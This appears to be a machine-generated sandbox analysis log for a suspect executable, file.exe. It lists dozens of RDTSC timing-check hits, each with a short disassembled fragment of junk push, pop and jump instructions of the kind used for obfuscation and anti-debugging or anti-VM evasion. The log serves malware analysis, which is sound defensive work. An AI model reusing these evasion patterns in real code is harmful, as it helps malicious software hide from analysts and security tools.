Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34BEAD second address: 34BEB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34C424 second address: 34C428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34C6EC second address: 34C71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C389FFh 0x00000009 jmp 00007F9558C389FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9558C38A02h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34C71D second address: 34C729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34C729 second address: 34C733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9558C389F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34C733 second address: 34C745 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95588494A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34C745 second address: 34C749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34CCAF second address: 34CCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F95588494B7h 0x0000000d ja 00007F95588494A6h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F95588494A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34CCDD second address: 34CCE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34CCE3 second address: 34CD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F95588494A6h 0x0000000e jmp 00007F95588494B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 356045 second address: 35605B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e jo 00007F9558C389FCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 356414 second address: 356418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 356418 second address: 356448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 je 00007F9558C38A20h 0x0000000d pushad 0x0000000e jmp 00007F9558C38A02h 0x00000013 js 00007F9558C389F6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c pushad 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push edi 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35673B second address: 356743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 356743 second address: 356755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9558C389F6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 356755 second address: 35676C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F95588494ADh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35E907 second address: 35E90D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35E90D second address: 35E912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35EB9C second address: 35EBA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35DDB8 second address: 35DDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35DDBC second address: 35DDCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F9558C389F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 366FEF second address: 366FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 366D52 second address: 366D67 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9558C389F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F9558C389FEh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 372C65 second address: 372C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F95588494A6h 0x00000009 jmp 00007F95588494B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 372C82 second address: 372C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F9558C389F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3728A9 second address: 3728B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 377446 second address: 3774B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9558C38A07h 0x00000008 jmp 00007F9558C38A07h 0x0000000d jnp 00007F9558C389F6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007F9558C389FFh 0x0000001d push edi 0x0000001e pop edi 0x0000001f popad 0x00000020 jmp 00007F9558C38A00h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F9558C38A03h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3774B9 second address: 3774BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3875AE second address: 3875B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3875B2 second address: 3875B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3875B6 second address: 3875BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38F5BE second address: 38F5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F95588494A6h 0x0000000a je 00007F95588494A6h 0x00000010 popad 0x00000011 jmp 00007F95588494B3h 0x00000016 popad 0x00000017 jg 00007F95588494D2h 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38DF51 second address: 38DF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38DF55 second address: 38DF65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38DF65 second address: 38DF6A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E249 second address: 38E24E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E24E second address: 38E254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E254 second address: 38E279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F95588494B9h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E506 second address: 38E50C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E50C second address: 38E510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E919 second address: 38E93E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9558C38A05h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F9558C38A2Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38E93E second address: 38E942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 393E00 second address: 393E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9558C389F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 393B2C second address: 393B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F95588494A6h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A438F second address: 3A43A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jnc 00007F9558C389F6h 0x0000000c jc 00007F9558C389F6h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A43A2 second address: 3A43C1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F95588494B5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A43C1 second address: 3A43D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C389FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A43D0 second address: 3A43FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B1h 0x00000007 jmp 00007F95588494B7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A43FC second address: 3A4404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A6E06 second address: 3A6E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A6E0A second address: 3A6E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A6E0E second address: 3A6E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A6C7D second address: 3A6C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A8543 second address: 3A854B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A854B second address: 3A855C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FAh 0x00000007 push ecx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B5E11 second address: 3B5E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F95588494B2h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jp 00007F95588494ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D06CF second address: 3D06DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnc 00007F9558C389F6h 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D06DF second address: 3D06E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F95588494AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CF648 second address: 3CF660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9558C38A01h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CF660 second address: 3CF66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CF66C second address: 3CF676 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CF7AD second address: 3CF7CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CFBBB second address: 3CFBDA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9558C38A05h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CFBDA second address: 3CFBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3CFBDE second address: 3CFC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9558C38A08h 0x00000011 pushad 0x00000012 jmp 00007F9558C38A01h 0x00000017 je 00007F9558C389F6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D0286 second address: 3D0295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F95588494A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D0295 second address: 3D0299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D0409 second address: 3D040D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D1BF7 second address: 3D1BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D1BFB second address: 3D1C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F95588494B7h 0x0000000f jmp 00007F95588494B1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D1C2D second address: 3D1C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F9558C389FFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4873 second address: 3D48B9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F95588494A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D20B8h], ecx 0x00000013 push 00000004h 0x00000015 mov dword ptr [ebp+122D1855h], eax 0x0000001b adc dx, 922Fh 0x00000020 call 00007F95588494A9h 0x00000025 pushad 0x00000026 push ecx 0x00000027 jmp 00007F95588494B5h 0x0000002c pop ecx 0x0000002d push edi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D48B9 second address: 3D48E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F9558C38A06h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D48E0 second address: 3D48F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D48F1 second address: 3D4908 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9558C389F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jg 00007F9558C389FEh 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B78 second address: 3D4B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D4B7C second address: 3D4B8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D641B second address: 3D6420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D6420 second address: 3D6456 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9558C389F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 ja 00007F9558C38A14h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7DBF second address: 3D7DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3D7DCB second address: 3D7DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40170 second address: 4D40186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 pushad 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov si, di 0x0000000e popad 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40186 second address: 4D4018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D4018A second address: 4D40190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D40190 second address: 4D401AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C38A06h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30027 second address: 4D30087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 51B24EB8h 0x00000008 movsx ebx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F95588494B8h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F95588494AEh 0x0000001d and esi, 40AF6848h 0x00000023 jmp 00007F95588494ABh 0x00000028 popfd 0x00000029 movzx eax, dx 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F95588494AEh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D700EB second address: 4D70107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70107 second address: 4D7010D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D7010D second address: 4D70111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D70111 second address: 4D7012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F95588494AAh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov edi, eax 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, 31h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D000A7 second address: 4D000AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D000AD second address: 4D000D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95588494B7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D000D9 second address: 4D00125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9558C389FFh 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F9558C38A02h 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F9558C38A00h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9558C389FAh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00125 second address: 4D0012B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
